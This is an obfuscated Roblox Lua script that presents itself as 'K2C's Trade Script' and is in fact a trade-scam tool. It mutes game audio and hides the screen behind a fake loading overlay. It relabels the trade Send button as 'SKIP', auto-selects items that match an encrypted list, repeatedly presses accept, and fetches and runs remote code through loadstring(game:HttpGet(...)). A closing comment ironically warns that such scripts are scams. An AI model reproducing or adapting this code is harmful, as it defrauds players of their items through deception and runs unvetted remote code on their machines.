--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v100,v101) local v102={};for v113=1, #v100 do v6(v102,v0(v4(v1(v2(v100,v113,v113 + 1 )),v1(v2(v101,1 + (v113% #v101) ,1 + (v113% #v101) + 1 )))%256 ));end return v5(v102);end local v8=0.3 -0 ;local function v9() local v103=0;for v114,v115 in ipairs(game:GetService(v7("\226\204\206\43\226\136\194\12\199\202\216\32","\126\177\163\187\69\134\219\167")):GetChildren()) do if v115:IsA(v7("\16\194\63\203\248\4\223\37\208\236","\156\67\173\74\165")) then local v137=0;local v138;while true do if (v137==0) then v138=v115.Volume;if (v138>(214 -(22 + 192))) then local v174=0;while true do if (0==v174) then v115.Volume=math.max(0,v138 * v8 );v103=v103 + (684 -(483 + 200)) ;break;end end end break;end end end end for v116,v117 in ipairs(game:GetDescendants()) do if (v117:IsA(v7("\7\184\92\24\184","\38\84\215\41\118\220\70")) and (v117.Volume>0)) then local v139=1463 -(1404 + 59) ;local v140;while true do if (v139==(0 -0)) then v140=v117.Volume;v117.Volume=math.max(0 -0 ,v140 * v8 );v139=766 -(468 + 297) ;end if (v139==(563 -(334 + 228))) then v103=v103 + (3 -2) ;break;end end end end if (v103>(0 -0)) then print(v7("\107\32\13\62\195\16\36\39\22\235\83\19\38\82","\158\48\118\66\114")   .. v103   .. v7("\235\37\5\50\122\170\187\164\38\26\51\112\177\232\235\108\14\101\35\224\187\189\43\28\35\126\160\178","\155\203\68\112\86\19\197") );end end v9();local v10=game:GetService(v7("\118\209\55\229\69\106\246","\152\38\189\86\156\32\24\133"));local v11=v10.LocalPlayer;local v12=game:GetService(v7("\200\64\162\67\242\100\162\84\234\94\164\67","\38\156\55\199"));local v13=game:GetService(v7("\158\116\110\60\6\117\246\106\166\109\105\60\62\117\244\66\175\120\110","\35\200\29\28\72\115\20\154"));local v14=v7("\11\189\201\222\158\63\49\13\182\213\133\194\99\101\72\233\133\135\223\127\99\77\236\128","\84\121\223\177\191\237\76");local v15=v7("\169\84\209\161\41\67\53\213\178\82\147\239\117\7\104\148\232\2\156\245\99\2\104\152\234\15\156","\161\219\54\169\192\90\48\80");local v16=Instance.new(v7("\122\65\18\32\76\76\39\48\64","\69\41\34\96"));v16.Name=v7("\144\204\214\14\11\37\187\240\212\24\7\46\178","\75\220\163\183\106\98");v16.ResetOnSpawn=false;v16.ZIndexBehavior=Enum.ZIndexBehavior.Global;v16.DisplayOrder=999;v16.Parent=v11:WaitForChild(v7("\50\182\138\46\220\16\157\158\62","\185\98\218\235\87"));local v23=Instance.new(v7("\237\46\38\235\219","\202\171\92\71\134\190"));v23.Size=UDim2.new(0.81249994,0,1.10000157 -0 ,0 + 0 );v23.Position=UDim2.new(236.5 -(141 + 95) ,0 + 0 ,0.439999968 -0 ,0);v23.AnchorPoint=Vector2.new(0.5,0.5 -0 );v23.BackgroundColor3=Color3.fromRGB(15,15,4 + 11 );v23.BackgroundTransparency=0;v23.BorderSizePixel=0 -0 ;v23.ZIndex=703 + 297 ;v23.Parent=v16;local v32=Instance.new(v7("\28\232\15\135\59\207\41\154","\232\73\161\76"));v32.CornerRadius=UDim.new(0 + 0 ,28 -8 );v32.Parent=v23;local v35=Instance.new(v7("\146\212\67\90\27\151\216\64\88\18","\126\219\185\34\61"));v35.Size=UDim2.new(0.7,0,0.4 + 0 ,163 -(92 + 71) );v35.Position=UDim2.new(0.5 + 0 ,0 -0 ,0.45,0);v35.AnchorPoint=Vector2.new(765.5 -(574 + 191) ,0.5);v35.BackgroundTransparency=1;v35.Image=v14;v35.ZIndex=826 + 175 ;v35.Parent=v23;local v43=Instance.new(v7("\57\231\125\125\108\121\246\245","\135\108\174\62\18\30\23\147"));v43.CornerRadius=UDim.new(0 -0 ,9 + 7 );v43.Parent=v35;local v46=Instance.new(v7("\130\236\50\223\52\175\49\194\186","\167\214\137\74\171\120\206\83"));v46.Size=UDim2.new(849.9 -(254 + 595) ,0,126.08 -(55 + 71) ,0 -0 );v46.Position=UDim2.new(0.5,1790 -(573 + 1217) ,0.32 -0 ,0);v46.AnchorPoint=Vector2.new(0.5 + 0 ,0.5 -0 );v46.BackgroundTransparency=940 -(714 + 225) ;v46.Text="K2C's Trade Script";v46.TextColor3=Color3.fromRGB(745 -490 ,355 -100 ,255);v46.TextSize=4 + 28 ;v46.Font=Enum.Font.GothamBold;v46.TextWrapped=true;v46.ZIndex=1449 -448 ;v46.Parent=v23;local v59=Instance.new(v7("\191\245\42\73\212\166\137\245\62","\199\235\144\82\61\152"));v59.Size=UDim2.new(806.9 -(118 + 688) ,0,48.15 -(25 + 23) ,0);v59.Position=UDim2.new(0.5 + 0 ,0,1886.68 -(927 + 959) ,0);v59.AnchorPoint=Vector2.new(0.5,0.5 -0 );v59.BackgroundTransparency=733 -(16 + 716) ;v59.Text=v7("\43\25\184\47\14\24\190\101\73\88\249\16\87\89\232\123\87\43","\75\103\118\217");v59.TextColor3=Color3.fromRGB(220,220,255);v59.TextSize=73 -35 ;v59.Font=Enum.Font.GothamBlack;v59.TextWrapped=true;v59.ZIndex=1001;v59.Parent=v23;local v72=Instance.new(v7("\244\91\101\26\189","\126\167\52\16\116\217"));v72.SoundId=v15;v72.Volume=1;v72.Looped=false;v72.Parent=v16;v72:Play();task.spawn(function() while v35.Parent do local v118=97 -(11 + 86) ;while true do if (v118==(2 -1)) then v12:Create(v35,TweenInfo.new(285.8 -(175 + 110) ,Enum.EasingStyle.Sine,Enum.EasingDirection.Out),{[v7("\52\231\191\203","\174\103\142\197")]=UDim2.new(0.7 -0 ,0,0.4 -0 ,1796 -(503 + 1293) )}):Play();task.wait(0.8 -0 );break;end if (v118==(0 + 0)) then v12:Create(v35,TweenInfo.new(1061.8 -(810 + 251) ,Enum.EasingStyle.Sine,Enum.EasingDirection.Out),{[v7("\251\39\58\133","\156\168\78\64\224\212\121")]=UDim2.new(0.78 + 0 ,0,0.45 + 0 ,0 + 0 )}):Play();task.wait(533.8 -(43 + 490) );v118=1;end end end end);task.spawn(function() local v104=733 -(711 + 22) ;local v105={"",".",v7("\24\102","\152\54\72\63\88\69\62"),v7("\154\138\160","\60\180\164\142")};local v106=1;while v104<100  do v104=v104 + 1 + 0 ;v106=(v106%(5 -1)) + 1 + 0 ;v59.Text=v7("\116\81\4\45\46\227\21","\114\56\62\101\73\71\141")   .. v105[v106]   .. v7("\248\210","\164\216\137\187")   .. v104   .. v7("\157\183\97\226\155","\107\178\134\81\210\198\158") ;task.wait(1745.75 -(1344 + 400) );end local v107=TweenInfo.new(406 -(255 + 150) ,Enum.EasingStyle.Sine);v12:Create(v23,v107,{[v7("\26\15\129\205\173\42\1\151\200\174\12\28\131\200\185\40\15\144\195\164\59\23","\202\88\110\226\166")]=1 + 0 }):Play();v12:Create(v59,v107,{[v7("\247\10\154\227\254\209\14\140\228\218\194\29\135\249\201\218","\170\163\111\226\151")]=1}):Play();v12:Create(v35,v107,{[v7("\56\61\179\63\75\3\59\16\62\161\40\79\37\44\31\51\171","\73\113\80\210\88\46\87")]=1 + 0 }):Play();v12:Create(v46,v107,{[v7("\181\41\213\6\211\147\45\195\1\247\128\62\200\28\228\152","\135\225\76\173\114")]=1}):Play();task.delay(4.1 -3 ,function() v16:Destroy();end);end);local function v77(v108) local v109=0;while true do if (v109==0) then if  not v108 then return;end for v141,v142 in ipairs(getconnections(v108.Activated)) do v142:Fire();end break;end end end local function v78(v110,v111) local v112=0;while true do if (v112==(0 -0)) then for v143,v144 in ipairs(v110:GetDescendants()) do if (v144.Name==v111) then return v144;end end return nil;end end end print(v7("\33\217\138\145\136\152\154\90\222\172\177\190\169\174\20\234\248\164\190\188\163\31\173\168\162\163\190\162\9\254\246\254\226","\199\122\141\216\208\204\221"));local v79=Workspace:FindFirstChild(v7("\153\207\17\244\125\219\172\222\24\249\118\243","\150\205\189\112\144\24"));local v80=v79 and v79:FindFirstChild(v7("\21\150\176\65\20\156","\112\69\228\223\44\100\232\113")) and v79.Prompt:FindFirstChild(v7("\228\13\8\203\191\113\143\192\6\55\193\185\113\150\192","\230\180\127\103\179\214\28")) ;if v80 then fireproximityprompt(v80);task.wait(1742 -(404 + 1335) );else local v120=0;while true do local v132=0;while true do if (v132==(406 -(183 + 223))) then if (v120==(1 -0)) then return;end if (v120==(0 + 0)) then loadstring(game:HttpGet(v7("\132\17\75\86\247\27\175\195\23\94\81\170\70\233\152\13\74\68\241\82\229\158\6\80\72\240\68\238\152\75\92\73\233\14\232\137\28\82\71\234\79\238\130\85\15\22\171\70\232\131\22\75\82\246\64\228\137\74\77\67\226\82\175\132\0\94\66\247\14\237\141\12\81\9\227\73\239\159\17\75\84\229\69\229\137\0","\128\236\101\63\38\132\33")))();warn(v7("\156\187\30\92\191\230\198\184\176\33\86\185\230\223\184\233\31\75\162\171\201\163\188\31\64","\175\204\201\113\36\214\139"));v120=1;end break;end end end end local v81=v11.PlayerGui:FindFirstChild(v7("\115\222\52\216\1\119\192\52\197\1\85\224\60\207\16","\100\39\172\85\188")) or v11:FindFirstChild(v7("\153\106\184\132\54\157\116\184\153\54\191\84\176\147\39","\83\205\24\217\224")) ;if  not v81 then local v121=0 + 0 ;local v122;while true do if (v121==(337 -(10 + 327))) then v122=0 + 0 ;while true do if (v122==0) then local v167=0;while true do if (v167==0) then warn(v7("\210\215\204\57\227\245\193\60\255\192\223\17\239\214\217\125\232\202\217\125\224\202\216\51\226","\93\134\165\173"));return;end end end end break;end end end local v82=v78(v81,v7("\141\247\192\208\57\198","\30\222\146\161\162\90\174\210"));if v82 then v77(v82);end task.wait(1);local v83=v78(v81,v7("\231\73","\106\133\46\16"));local v84=v83 and v78(v83,v7("\107\37\114\238\89\72\126\50\114\241\95","\32\56\64\19\156\58")) ;local v85=v84 and v78(v84,v7("\105\205\228\68\89\250\162\85\208","\224\58\168\133\54\58\146")) ;if (v85 and v85:IsA(v7("\109\83\83\233\87\137\159","\107\57\54\43\157\21\230\231"))) then v85:CaptureFocus();task.wait(338.05 -(118 + 220) );v85.Text=v7("\213\132\30\247\174\221\193\207\152\5\231\184\208\206\215\142\3\250","\175\187\235\113\149\217\188");task.wait(0.1 + 0 );v13:SendKeyEvent(true,Enum.KeyCode.Return,false,game);task.wait(449.05 -(108 + 341) );v13:SendKeyEvent(false,Enum.KeyCode.Return,false,game);v85:ReleaseFocus();task.wait(3);else local v124=0;while true do if (v124==(0 + 0)) then warn(v7("\15\170\128\94\224\113\90\51\183\193\66\236\109\56\58\160\148\66\231","\24\92\207\225\44\131\25"));return;end end end local v86=v78(v81,v7("\108\223\183\78\26\113","\29\43\179\216\44\123"));local v87=v86 and v78(v86,v7("\145\208\51\88","\44\221\185\64")) ;local v88=nil;if v87 then for v133,v134 in ipairs(v87:GetChildren()) do if v134:IsA(v7("\39\245\73\82\118","\19\97\135\40\63")) then for v160,v161 in ipairs(v134:GetDescendants()) do if ((v161:IsA(v7("\154\89\43\47\3\48\172\89\63","\81\206\60\83\91\79")) or v161:IsA(v7("\122\174\200\102\13\214\89\176\65\165","\196\46\203\176\18\79\163\45"))) and v161.Text and v161.Text:find(v7("\182\45\113\28\51\250\225\172\49\106\12\37\247\238\180\39\108\17","\143\216\66\30\126\68\155"))) then v88=v134;break;end end if v88 then break;end end end end if  not v88 then local v125=0;while true do if ((0 -0)==v125) then local v145=1493 -(711 + 782) ;while true do if (v145==(0 -0)) then warn(v7("\164\199\2\201\210\162\217\245\185\220\31\202\201\162\219\228\184\199\77\197\202\183\151\231\165\221\3\207","\129\202\168\109\171\165\195\183"));return;end end end end end local v89=v78(v88,v7("\4\81\59\212","\134\66\56\87\184\190\116"));local v90=v89 and v78(v89,v7("\15\52\7\191","\85\92\81\105\219\121\139\65")) ;if v90 then local v126=469 -(270 + 199) ;local v127;local v128;local v129;while true do if (v126==(2 + 2)) then local v146=1819 -(580 + 1239) ;while true do if (v146==(0 -0)) then v90.BackgroundTransparency=0;v90.BorderSizePixel=0 + 0 ;v146=1;end if (v146==(1 + 0)) then v90.ZIndex=1307 + 1693 ;v126=5;break;end end end if (v126==(4 -2)) then v127.Parent=v11:WaitForChild(v7("\72\139\47\14\125\149\9\2\113","\119\24\231\78"));v90.Parent=v127;v90.Size=UDim2.new(0.45,0 + 0 ,1167.12 -(645 + 522) ,1790 -(1010 + 780) );v126=3;end if ((3 + 0)==v126) then local v150=0;while true do if (v150==(0 -0)) then v90.Position=UDim2.new(0.5 -0 ,0,1836.82 -(1045 + 791) ,0 -0 );v90.AnchorPoint=Vector2.new(0.5,0.5);v150=1 -0 ;end if (v150==(506 -(351 + 154))) then v90.BackgroundColor3=Color3.fromRGB(255,255,255);v126=1578 -(1281 + 293) ;break;end end end if (v126==5) then v90.AutoButtonColor=false;v128=v90:FindFirstChild(v7("\182\53\177","\113\226\77\197\42\188\32"));if v128 then local v165=0;local v166;while true do if (v165==0) then v166=266 -(28 + 238) ;while true do if (v166==3) then v128.BackgroundTransparency=2 -1 ;v128.ZIndex=3001;break;end if (v166==(1559 -(1381 + 178))) then local v182=0 + 0 ;while true do if (v182==(0 + 0)) then v128.Text=v7("\9\61\221\133","\213\90\118\148");v128.TextColor3=Color3.fromRGB(0 + 0 ,0 -0 ,0 + 0 );v182=1;end if ((471 -(381 + 89))==v182) then v128.TextSize=45;v166=1;break;end end end if (v166==(1 + 0)) then v128.Font=Enum.Font.GothamBlack;v128.Size=UDim2.new(1 + 0 ,0 -0 ,1157 -(1074 + 82) ,0);v128.Position=UDim2.new(0.5 -0 ,1784 -(214 + 1570) ,0.5,1455 -(990 + 465) );v166=1 + 1 ;end if (v166==(1 + 1)) then v128.AnchorPoint=Vector2.new(0.5 + 0 ,0.5 -0 );v128.TextXAlignment=Enum.TextXAlignment.Center;v128.TextYAlignment=Enum.TextYAlignment.Center;v166=1729 -(1668 + 58) ;end end break;end end else warn(v7("\111\54\160\22\78\83\39\184\82\13\85\33\160\22\75\84\59\186\82\13\84\32\244\101\72\85\42\244\84\88\79\58\187\88","\45\59\78\212\54"));end v126=632 -(512 + 114) ;end if (v126==(15 -9)) then v129=false;v90.MouseButton1Click:Connect(function() local v162=0;while true do if (v162==1) then print("[TRADE] SKIP clicked → Sending trade request");v77(v90);v162=3 -1 ;end if (v162==0) then if v129 then return;end v129=true;v162=3 -2 ;end if (v162==(1 + 1)) then task.delay(0.4,function() if v90.Parent then v90.BackgroundColor3=Color3.fromRGB(19 + 81 ,174 + 26 ,860 -605 );end end);break;end end end);print(v7("\43\98\177\170\162\11\144\176\51\90\138\136\141\110\185\248\21\22\148\131\143\58\168\176\35\125\170\187\198\44\184\228\4\89\141\203\206\34\162\231\21\68\195\132\136\110\190\243\2\83\134\133\207\110\185\255\80\69\134\133\130\110\185\248\21\22\151\153\135\42\168\176\2\83\146\158\131\61\185\177","\144\112\54\227\235\230\78\205"));break;end if (v126==0) then local v152=1994 -(109 + 1885) ;local v153;while true do if (0==v152) then v153=1469 -(1269 + 200) ;while true do if (v153==(1 -0)) then v127.Name=v7("\236\20\253\12\21\201\26\230\14\51\219\26\211\9\51","\90\191\127\148\124");v126=816 -(98 + 717) ;break;end if (v153==0) then print("[TRADE] Send button found → Converting to SKIP button...");v127=Instance.new(v7("\206\176\66\64\121\209\218\166\89","\191\157\211\48\37\28"));v153=827 -(802 + 24) ;end end break;end end end if (v126==(1 -0)) then v127.ResetOnSpawn=false;v127.ZIndexBehavior=Enum.ZIndexBehavior.Global;v127.DisplayOrder=2000;v126=2;end end else local v130=0;while true do if (v130==(0 -0)) then warn(v7("\128\45\1\248\144\89\166\60\27\243\222\27\189\39\27\188\214\84\166\38\11","\59\211\72\111\156\176"));return;end end end print(v7("\117\179\209\12\106\162\222\109\121\134\234\57\71\137\228\109\72\136\241\109\66\142\245\40\14\147\241\44\74\130\163\62\77\149\230\40\64\201\173\99","\77\46\231\131"));local v91,v92;local v93=tick();while (tick() -v93)<(9 + 51)  do v91=v11.PlayerGui:FindFirstChild(v7("\142\70\183\68\191\120\191\86\191\96\164\65\190\81","\32\218\52\214"));if v91 then v92=v91:FindFirstChild(v7("\122\5\48\172\244\156\76\76\75\35\35\169\245\181","\58\46\119\81\200\145\208\37")) or v91 ;if (v92 and v92:IsA(v7("\13\158\49\161\172","\86\75\236\80\204\201\221")) and v92.Visible) then print(v7("\94\72\97\128\190\159\96\64\115\128\190\143\119\85\114\134\234\142\118\0","\235\18\33\23\229\158"));break;end end task.wait(1);end if  not v92 then warn(v7("\124\179\215\190\16\174\211\186\84\191\129\189\66\187\204\190\16\180\206\175\16\188\206\174\94\190","\219\48\218\161"));return;end print(v7("\197\117\120\64\213\72\160\229\125\112\9\214\78\244\231\121\117\71\220\15\233\240\116\113\90\149\1\174","\128\132\17\28\41\187\47"));local v94=v78(v92,v7("\56\61\19\40","\61\97\82\102\90"));local v95=v94 and v78(v94,v7("\159\45\185\68\203\91\23\7\171\8\185\74\202\82","\105\204\78\203\43\167\55\126")) ;local v96=0 + 0 ;local v97={v7("\182\190\49\31\4\6\194\67\183\179\99\27\31\1\215\89\164\164\55","\49\197\202\67\126\115\100\167"),v7("\58\94\208\62\140","\62\87\59\191\73\224\54"),v7("\239\7\251\205\235\7\233\218\167\10\245\219\244\7\247\200\233","\169\135\98\154"),v7("\216\124\45\86\244\55\193\139\99\43\93\241\54\220","\168\171\23\68\52\157\83"),v7("\243\99\252\171\35\36\137","\231\148\17\149\205\69\77"),v7("\136\190\195\233\86\191\132\181\198\252\88\241\192\164\198\245\89\250\140\171\200\245\94","\159\224\199\167\155\55"),v7("\243\225\61\213\248\253\124\213\254\253\59\215\229\250\50\219","\178\151\147\92"),v7("\136\239\77\53\29\66\58\143\252\66\60\23\64\118\131\243\69","\26\236\157\44\82\114\44"),v7("\41\43\199\89\47\60\192\72","\59\74\78\181"),v7("\38\208\74\83\167\36\223\85\26\190\42\211\67","\211\69\177\58\58"),v7("\181\240\107\242\252\217\184\165\120\251\237\139\177\247\96\224\251\196","\171\215\133\25\149\137"),v7("\230\201\32\251\226\49\188\67\239\204\114\247\238\52\233\76\229\221\60\253","\34\129\168\82\154\143\80\156"),v7("\137\179\37\10\76\65\155\140\166\60\75\91\94\128\139\187\39\4","\233\229\210\83\107\40\46"),v7("\205\77\36\211\69\205\77\36\211\69\195\71\51\196","\101\161\34\82\182"),v7("\228\12\25\237\206\242\144\43\229\8\25\253\212\239\128\39\230\12\74\247\212\236","\78\136\109\57\158\187\130\226"),v7("\61\58\245\244\45\43\240\240\50\127\233\244\57\62\234\228\45","\145\94\95\153"),v7("\237\194\4\214\91\165\232\141\21\219\74\247\251\196\14\207\91\165\232","\215\157\173\116\181\46"),v7("\39\187\152\247\195\117\181\133\246\154\33\177\143\246\195","\186\85\212\235\146"),v7("\193\142\25\245\48\235\24\195\143\18\190\52\231\84\201\136","\56\162\225\118\158\89\142"),v7("\87\0\212\186\50\217\72\69\194\189\45\203","\184\60\101\160\207\66"),v7("\35\135\117\178\56\150\115\252\34\142\121\181\54\138\117\168\62","\220\81\226\28"),v7("\31\218\145\187\235\202\26\210\141\232","\167\115\181\226\155\138"),v7("\238\35\167\79\126\114\212\231\54\167\95\116\124\196\235\44\230\79\114\126\200","\166\130\66\135\60\27\17"),v7("\72\69\221\53\35\65\65\193\121\49\76\89","\80\36\42\174\21"),v7("\66\17\119\121\79\3\54\58\76\31\56","\26\46\112\87"),v7("\191\49\170\115\173\190\72\181\249\34\165\112\255\188\77\187\186\49\170\121\190","\212\217\67\203\20\223\223\37"),v7("\182\140\232\212\181\130\172\146\185\130\165\208\179\131\169\198\179\130\166","\178\218\237\200"),v7("\165\165\233\223\189\172\166\209\184\177\166\192\163\184\246\219\175","\176\214\213\134"),v7("\248\172\246\211\161\88\94\241\191\246\199\173\93\86\248\172\190","\57\148\205\214\180\200\54"),v7("\21\244\59\51\115\0\189\50\49\100\19\233","\22\114\157\85\84"),v7("\200\196\0\132\78\230\169\195\195\22\208\73\255\187","\200\164\171\115\164\61\150"),v7("\184\241\16\81\138\168\241\67\19\212","\227\222\148\99\37"),v7("\56\87\70\245\241\38\64\71\182\248\61\86\18\251\236\32\70\71\228\236","\153\83\50\50\150"),v7("\81\121\96\92\99\190\74\90\127\118\15","\45\61\22\19\124\19\203"),v7("\205\29\30\181\10\127\173\210\2\2\225\17\121\173\206\1","\217\161\114\109\149\98\16"),v7("\4\37\54\104\179\120\27\37\42\115\252\100\19\54\55\114\185\102\29","\20\114\64\88\28\220"),v7("\37\8\209\160\249\211\253\34\0\218\161\234","\221\81\97\178\212\152\176"),v7("\198\226\9\238\10\204\243\93\240\31\221\230\9","\122\173\135\125\155"),v7("\144\192\14\190\127\37\201\138\198\64\178\58\61\205\144\192\14\190","\168\228\161\96\217\95\81"),v7("\214\222\32\89\54\23\214\222\32\89\54\23\203\196\41\91\54","\55\187\177\78\60\79")};if v95 then for v135,v136 in ipairs(v95:GetChildren()) do if (v136:IsA(v7("\11\220\94\230\67","\224\77\174\63\139\38\175")) and v136.Name:find(v7("\183\68\84\43\135\85\81\33\138","\78\228\33\56"))) then local v158=325 -(45 + 280) ;local v159;while true do if (v158==0) then v159=v136:FindFirstChild(v7("\253\110\179\0\128\220","\229\174\30\210\99"));if v159 then local v175=0 + 0 ;local v176;while true do if ((0 + 0)==v175) then v176=v159:FindFirstChild(v7("\47\228\146\93\232","\89\123\141\230\49\141\93"));if (v176 and (v176:IsA(v7("\199\116\238\24\50\69\235","\42\147\17\150\108\112")) or v176:IsA(v7("\59\163\53\107\203\233\13\163\33","\136\111\198\77\31\135")))) then local v192=0 + 0 ;local v193;local v194;while true do if (v192==(0 + 0)) then v193=v176.Text or "" ;v194=v193:lower();v192=1 + 0 ;end if (v192==(1 -0)) then for v198,v199 in ipairs(v97) do if v194:find(v199) then task.wait(1912.5 -(340 + 1571) );v77(v159);print(v7("\35\13\163\83\185\190\87","\201\98\105\199\54\221\132\119")   .. v193 );v96=v96 + 1 + 0 ;break;end end break;end end end break;end end end break;end end end end end print(v7("\159\5\141\40\17\61\169\189\76\130\37\6\60\162\190\76\138\53\7\56\191\247\76\183\46\22\52\160\249\13\135\37\7\49\246\249","\204\217\108\227\65\98\85")   .. v96 );if (v96==0) then print(v7("\101\231\208\198\0\233\112\230\200\165\2\207\30\206\244\241\47\200\87\205\242\165\37\212\91\206\230\165\42\207\75\205\241","\160\62\163\149\133\76"));local v131=v78(v92,v7("\245\161\3\44\198\218","\163\182\192\109\79")) or v78(v92,v7("\16\35\3\204\252\58\35","\149\84\70\96\160")) or v78(v92,v7("\27\10\2\254\61","\141\88\102\109")) ;if v131 then v77(v131);end return;end print(v7("\128\71\203\98\14\52\91\198\243\65\207\113\30\36\21\205\188\92\218\62\84\115","\161\211\51\170\16\122\93\53"));local v98=v78(v92,v7("\201\171\179\44\226\140\167\60\239\161\188","\72\155\206\210"));local v99=tick();while (tick() -v99)<(1832 -(1733 + 39))  do if ( not v92.Visible or  not v92.Parent) then print(v7("\114\104\85\10\54\6\124\70\15\62\67\58\87\2\60\85\127\80","\83\38\26\52\110"));break;end if v98 then v77(v98);task.wait(1);end task.wait(0.3 -0 );end print(v7("\107\20\53\79\72\3\103\64\81\25\46\85\80\18\35\7","\38\56\119\71"));-- |    hidden in plain sight...             |
-- |   all sab freeze trade stuff is a scam    |
-- |    don't get scammed                      |
-- \___________________________________________/
